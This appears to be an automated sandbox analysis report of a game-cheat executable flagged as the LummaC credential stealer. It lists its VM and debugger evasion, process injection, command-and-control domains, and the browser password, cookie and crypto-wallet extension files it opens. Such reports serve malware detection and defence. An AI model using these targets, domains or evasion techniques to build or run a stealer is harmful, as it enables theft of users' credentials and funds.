              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\CheatInjector.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeAPI coverage: 5.9 %
              Source: C:\Users\user\Desktop\CheatInjector.exe TID: 2412Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exe TID: 2412Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004DB239 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_004DB239
              Source: Amcache.hve.4.drBinary or memory string: VMware
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
              Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: CheatInjector.exe, 00000001.00000002.1917876734.000000000159C000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000002.1917876734.00000000015DA000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1916727727.00000000015DA000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1916727727.000000000159C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: CheatInjector.exe, 00000001.00000002.1917876734.00000000015DA000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1916727727.00000000015DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWV
              Source: Amcache.hve.4.drBinary or memory string: vmci.sys
              Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
              Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
              Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
              Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.4.drBinary or memory string: VMware20,1
              Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Users\user\Desktop\CheatInjector.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004C511C LdrInitializeThunk,0_2_004C511C
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004CB4F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004CB4F3
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004C59D6 mov edi, dword ptr fs:[00000030h]0_2_004C59D6
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004D951A mov eax, dword ptr fs:[00000030h]0_2_004D951A
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004D18CF mov ecx, dword ptr fs:[00000030h]0_2_004D18CF
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004C59D6 DeleteFileA,VirtualProtect,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,GetStdHandle,WriteConsoleA,GetProcessHeap,HeapFree,0_2_004C59D6
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004C7479 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004C7479
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004CB4F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004CB4F3
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004C777F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004C777F
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004C790C SetUnhandledExceptionFilter,0_2_004C790C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\CheatInjector.exeMemory written: C:\Users\user\Desktop\CheatInjector.exe base: 400000 value starts with: 4D5AJump to behavior
              LummaC encrypted strings found
              Source: CheatInjector.exeString found in binary or memory: scriptyprefej.store
              Source: CheatInjector.exeString found in binary or memory: navygenerayk.store
              Source: CheatInjector.exeString found in binary or memory: founpiuer.store
              Source: CheatInjector.exeString found in binary or memory: necklacedmny.store
              Source: CheatInjector.exeString found in binary or memory: thumbystriw.store
              Source: CheatInjector.exeString found in binary or memory: fadehairucw.store
              Source: CheatInjector.exeString found in binary or memory: crisiwarny.store
              Source: CheatInjector.exeString found in binary or memory: presticitpo.store
              Source: CheatInjector.exeString found in binary or memory: prinyveri.cfd
              Source: C:\Users\user\Desktop\CheatInjector.exeProcess created: C:\Users\user\Desktop\CheatInjector.exe "C:\Users\user\Desktop\CheatInjector.exe"Jump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: GetLocaleInfoW,0_2_004DE1A7
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004DE2D0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: GetLocaleInfoW,0_2_004DE3D6
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_004DE4A5
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: EnumSystemLocalesW,0_2_004D54FD
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: GetLocaleInfoW,0_2_004D59C6
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: EnumSystemLocalesW,0_2_004DDDE3
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: EnumSystemLocalesW,0_2_004DDE2E
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: EnumSystemLocalesW,0_2_004DDEC9
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_004DDF54
              Source: C:\Users\user\Desktop\CheatInjector.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004C7679 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004C7679
              Source: C:\Users\user\Desktop\CheatInjector.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: CheatInjector.exe, CheatInjector.exe, 00000001.00000003.1881011106.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000002.1919006642.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1871189274.0000000001645000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
              Source: C:\Users\user\Desktop\CheatInjector.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: CheatInjector.exe PID: 2892, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: CheatInjector.exe, 00000001.00000003.1832867124.0000000001624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: CheatInjector.exe, 00000001.00000003.1832867124.0000000001624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: CheatInjector.exeString found in binary or memory: Jaxx Liberty
              Source: CheatInjector.exe, 00000001.00000003.1832867124.0000000001624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: CheatInjector.exeString found in binary or memory: ExodusWeb3
              Source: CheatInjector.exe, 00000001.00000003.1916727727.00000000015C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: CheatInjector.exe, 00000001.00000003.1832867124.0000000001624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: CheatInjector.exe, 00000001.00000003.1832867124.0000000001624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\CheatInjector.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
